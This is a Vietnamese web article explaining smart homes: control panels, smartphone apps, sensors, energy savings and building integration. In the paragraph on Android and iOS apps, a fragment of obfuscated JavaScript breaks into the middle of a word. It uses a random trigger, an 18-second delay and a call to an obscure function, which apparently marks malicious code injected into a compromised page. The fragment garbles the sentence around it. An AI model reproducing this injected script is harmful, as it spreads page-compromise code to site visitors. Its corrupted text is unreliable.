Ngôi nhà thông minh

Như thế nào được gọi là  một ngôi nhà thông minh?

 

Ngôi nhà thông minh là giải pháp giúp tối ưu hóa việc điều khiển các thiết bị điện trong nhà dễdàng hơn thông qua các bảng điều khiển được gắn trên tường hay thông qua thiết bị di động như smartphone hay talet.

Hiện nay mô hình ngôi nhà thông minh ngày càng trở nên tinh vi, các tín hiệu được mã hóa và gửi qua hệ thống mạng không dây và dây dẫn đến bộ chuyển mạch, ổ điện được lập trình sẵn nhằm điều khiển các thiết bị điện trong nhà. Thiết bị không những phù hợp với những người bận rộn quản lý ngôi nhà của mình tốt hơn, tránh tình trạng có trộm ghé thăm thì ngôi nhà còn phù hợp với những người khuyết tật dể dạng tương tác với các thiết bị điện trong nhà.

nha-thong-minh-1

Các thành phần của ngôi nhà bao gồm các cảm biến, các thiết bị điều khiển và các thiết bị khác. Nhờ có các cảm biến như cảm biến từ,cảm biến nhiệt…các bộ điều khiển đưa ra các quyết định điều chỉnh các thiết bị điện trong ngôi nhà cho phù hợp nhằm tiết kiệm thời gian, tiền bạc và điện năng.

Ngoài ra, cùng với sự phát triển của các ứng dụng dành cho ngôi nhà thông minh lên andom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}androi và ios giúp người sử dụng có thể hẹn giờ lên từng thiết bị điện, họ cũng có thể truy cập từ bên ngoài để điều khiển các thiết bị bên trong ngôi nhà.

nha-thong-minh-2
Quản lý kiểm tra con bạn thông qua thiết bị di động

 

Trên thế giới, các kiến trúc sư cũng đang cân nhắc đến việc đưa mô hình vào các thiết kế của mình, hệ thống sẽ được tích hợp trong quá trình xây nhà, giảm chi phí thi công, ngoài ra ta cũng có thể dể dàng thay công tắc cơ bằng công tắc cảm ứng với kích thước tương tự mà không cần phải đục khoét ngôi nhà của mình

0/5 (0 Reviews)

Trả lời

Email của bạn sẽ không được hiển thị công khai. Các trường bắt buộc được đánh dấu *